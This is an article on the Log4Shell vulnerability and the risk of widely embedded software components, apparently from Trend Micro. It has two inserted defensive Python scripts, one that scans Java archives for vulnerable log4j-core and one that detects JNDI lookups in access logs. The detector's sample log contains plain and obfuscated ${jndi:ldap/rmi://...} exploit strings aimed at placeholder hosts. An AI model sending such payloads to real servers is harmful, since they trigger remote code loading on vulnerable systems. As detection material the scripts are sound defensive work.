Log4j - Log4Shell Alert - Just an Isolated Case?


The short answer to whether Log4j / Log4Shell was a one-off is no. The impact of the Log4Shell vulnerability (CVE-2021-44228) was certainly unusual, but remote code execution (RCE) vulnerabilities themselves are not rare, as the attacks on Microsoft Exchange in spring 2021 by the group known as "Hafnium" showed.

Software components such as the affected library, which are used in many applications at once and therefore offer a broad attack surface, are likewise part of everyday IT. What is special about the Log4j / Log4Shell incident is that all of these factors come together: an easily exploitable RCE in a component that is embedded almost everywhere.

Other weaknesses in everyday IT

That, at least, happens rather seldom, and it will probably (hopefully) be some time before something similar occurs again. The probability is rising, however, mainly because ever more software is being written, and it has to ship quickly, so developers rely on ready-made building blocks such as Log4j rather than writing everything themselves. When a vulnerability is then found in such a component, it is no longer a single vendor that has to react (as Microsoft did with "Hafnium"), but every manufacturer and in-house team that embeds the component: the individual company with its custom-built customer portal as much as the vendor of a widely deployed product, and frequently without either knowing the component is there at all, because it arrived as a transitive dependency of something else. As the number of such modules grows, so does the probability that a vulnerability becomes known in one or another of them.
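The transitive-dependency problem described above is exactly why so many teams in December 2021 first had to find out where log4j-core was hiding inside artefacts they had not built themselves. The following Python script is an added example, not code from the article or from Trend Micro: it walks a Java archive held in memory, recurses into nested jar/war/ear entries, reads the log4j-core version from its Maven pom.properties, and checks whether JndiLookup.class is still present (deleting that class from the jar was the widely used stop-gap mitigation). The version range it flags, log4j-core 2.0-beta9 through 2.14.1, is the published affected range for CVE-2021-44228. The function and helper names (scan_archive, build_sample_war, Finding) are this example's own, and the sample WAR is constructed inline so the script runs offline.

```python
import io
import re
import zipfile
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple, Union

# Well-known paths inside a log4j-core jar (assumption: an unrelocated, unshaded copy).
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
NESTED = (".jar", ".war", ".ear", ".zip")


def _parse(version: str) -> Tuple[int, int, int]:
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 9). Missing parts become zero."""
    nums = [int(x) for x in re.findall(r"\d+", version)[:3]]
    nums += [0] * (3 - len(nums))
    return nums[0], nums[1], nums[2]


@dataclass
class Finding:
    location: str              # e.g. "portal.war!WEB-INF/lib/log4j-core-2.14.1.jar"
    version: Optional[str]     # None when pom.properties is missing
    jndi_lookup_present: bool

    def status(self) -> str:
        """Log4Shell (CVE-2021-44228) affects log4j-core 2.0-beta9 through 2.14.1."""
        if self.version is None:
            # A JndiLookup class without version metadata deserves a manual look.
            return "review" if self.jndi_lookup_present else "ok"
        v = _parse(self.version)
        if v[0] != 2 or v >= (2, 15, 0):
            return "ok"
        # Old version: exploitable unless the class was stripped as a stop-gap.
        return "vulnerable" if self.jndi_lookup_present else "mitigated"


def scan_archive(data: bytes, location: str, findings: List[Finding]) -> None:
    """Inspect one archive held in memory and recurse into nested archives."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        if POM_PROPS in names:
            props = zf.read(POM_PROPS).decode("utf-8", "replace")
            m = re.search(r"^version=(.+)$", props, re.MULTILINE)
            findings.append(Finding(location, m.group(1).strip() if m else None,
                                    JNDI_LOOKUP in names))
        elif JNDI_LOOKUP in names:
            # Repackaged copies sometimes drop the Maven metadata but keep the class.
            findings.append(Finding(location, None, True))
        for name in sorted(names):
            if name.lower().endswith(NESTED):
                scan_archive(zf.read(name), f"{location}!{name}", findings)


def scan(data: bytes, name: str) -> List[Finding]:
    findings: List[Finding] = []
    scan_archive(data, name, findings)
    return findings


def _make_zip(entries: Dict[str, Union[str, bytes]]) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def build_sample_war() -> bytes:
    """Constructed sample: one web app bundling three different copies of log4j-core."""
    class_stub = b"\xca\xfe\xba\xbe"  # placeholder bytes standing in for a .class file
    unpatched = _make_zip({POM_PROPS: "artifactId=log4j-core\nversion=2.14.1\n",
                           JNDI_LOOKUP: class_stub})
    mitigated = _make_zip({POM_PROPS: "artifactId=log4j-core\nversion=2.14.1\n"})
    patched = _make_zip({POM_PROPS: "artifactId=log4j-core\nversion=2.17.1\n",
                         JNDI_LOOKUP: class_stub})
    return _make_zip({
        "WEB-INF/lib/log4j-core-2.14.1.jar": unpatched,
        # A vendor bundle that hides its own copy two levels deep.
        "WEB-INF/lib/vendor-bundle.jar": _make_zip({"lib/log4j-core.jar": mitigated}),
        "WEB-INF/lib/log4j-core-2.17.1.jar": patched,
    })


if __name__ == "__main__":
    for f in scan(build_sample_war(), "portal.war"):
        print(f"{f.status():<11} {f.version or '?':<8} {f.location}")
```

Run against a real deployment directory, the same walk over every .jar/.war/.ear on disk turns up the copies that no bill of materials listed. Two caveats a practitioner should keep in mind: a shaded jar that relocated the package will not match the class path above and needs a content search instead, and a "mitigated" verdict only covers the JNDI lookup, so the later Log4j fixes still require an actual upgrade.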

High level of danger

For Log4j / Log4Shell, the UK's National Cyber Security Centre (NCSC) has prepared a useful list of questions. It is aimed at company leadership and is intended to guide boards through the situation. The background is that a vulnerability of this kind has the potential to threaten a company's existence, because it makes it easy for criminal actors to get into systems. There is a small upside to that: when a vulnerability is this easy to exploit, many low-skilled opportunists exploit it too, typically to drop cryptocurrency miners, and in doing so they frequently draw attention to vulnerable systems without causing great damage. Professional cybercriminals, on the other hand, use the gap to gain a foothold in a network and then move through it until they reach their target, without being noticed. That takes time; depending on the system and the size of the company, weeks to months. An increase in ransomware incidents from January onwards is therefore to be expected.
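Spotting the noisy opportunists mentioned above is usually the first detection win after a disclosure like this, and their requests land in the logs of any Java service that logs a request header. The following Python snippet is an added example, not code from the article or from Trend Micro: it folds the common Log4j lookup obfuscations (${lower:...}, ${upper:...} and the ${...:-default} form) back to their literals and then flags every line that carries a ${jndi:...} lookup, reporting the scheme requested. The access-log lines and the addresses in them are constructed for the example (203.0.113.0/24 is a documentation range), and the function names are this example's own.

```python
import re
from typing import List, Tuple

# Each pattern refuses a nested "${" inside its braces, so innermost lookups fold first.
_LOWER = re.compile(r"\$\{lower:([^{}$]*)\}", re.IGNORECASE)
_UPPER = re.compile(r"\$\{upper:([^{}$]*)\}", re.IGNORECASE)
# ${::-j}, ${env:NOT_SET:-j}, ${sys:nope:-j}: the text after ":-" is the default value.
_DEFAULT = re.compile(r"\$\{[^{}$]*?:-([^{}$]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]*)", re.IGNORECASE)


def normalize(s: str, max_rounds: int = 20) -> str:
    """Resolve lower/upper/default-value lookups until the string stops changing."""
    for _ in range(max_rounds):
        new = _LOWER.sub(lambda m: m.group(1).lower(), s)
        new = _UPPER.sub(lambda m: m.group(1).upper(), new)
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == s:
            break
        s = new
    return s


def detect(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line_number, scheme, normalized lookup) for each line with a JNDI lookup."""
    hits: List[Tuple[int, str, str]] = []
    for i, line in enumerate(lines, 1):
        norm = normalize(line)
        m = _JNDI.search(norm)
        if not m:
            continue
        end = norm.find("}", m.start())   # inner lookups are folded, so this closes it
        payload = norm[m.start():end + 1] if end != -1 else norm[m.start():]
        hits.append((i, m.group(1).lower(), payload))
    return hits


# Constructed access-log lines in combined log format; the User-Agent is the last field.
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [10/Dec/2021:20:14:03 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [10/Dec/2021:20:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://203.0.113.10:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:20:15:41 +0000] "GET /login HTTP/1.1" 200 774 "-" '
    '"${${lower:j}${lower:n}${::-d}i:${env:NOT_SET:-l}dap://203.0.113.10:1389/b}"',
    '203.0.113.9 - - [10/Dec/2021:20:16:02 +0000] "GET /api HTTP/1.1" 404 0 "-" '
    '"${jNdI:RMI://203.0.113.11:1099/x}"',
    '203.0.113.12 - - [10/Dec/2021:20:17:55 +0000] "GET /docs HTTP/1.1" 200 9921 "-" "curl/7.79.1"',
]

if __name__ == "__main__":
    for line_no, scheme, payload in detect(SAMPLE_ACCESS_LOG):
        print(f"line {line_no}: {scheme:<5} {payload}")
```

A hit here means an attempt, not a compromise: the lookup only fires if the string reached a vulnerable Log4j call, so the next step is to correlate the flagged timestamps with outbound LDAP, RMI or DNS connections from the affected host. The normalizer deliberately covers only the three obfuscation forms named above; other lookups (for example ${date:...}) pass through unchanged and will be missed.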

Is Log4j / Log4Shell just a special case?

Richard Werner, Business Consultant at Trend Micro (Image: Trend Micro).

The sheer spread of software and the range of ways it is used guarantee that in every company there is always a window or a door open somewhere for the thief. The only real question is who discovers the vulnerability first and uses it in their own interest. Log4Shell shows once again, just like Hafnium, Kaseya and the other cybersecurity incidents of 2021, that a purely preventive approach that tries to block every attack before it causes damage is hard to sustain.

Today we must assume that somewhere, someone will find a window to climb through. How quickly a company can identify and hunt down this "thief" determines how much damage is done. Organizationally, this is the job of "tiger teams" in an emergency and of the Security Operations Center (SOC) in general. Technologically, much of the associated work can be greatly simplified with tooling such as Extended Detection and Response (XDR).

About Trend Micro

As one of the world's leading providers of IT security, Trend Micro helps create a secure world for digital data exchange. With over 30 years of security expertise, global threat research, and constant innovation, Trend Micro offers protection for businesses, government agencies, and consumers. Thanks to our XGen™ security strategy, our solutions benefit from a cross-generational combination of defense techniques optimized for leading-edge environments. Networked threat information enables better and faster protection. Optimized for cloud workloads, endpoints, email, the IIoT and networks, our connected solutions provide centralized visibility across the entire enterprise for faster threat detection and response.


 
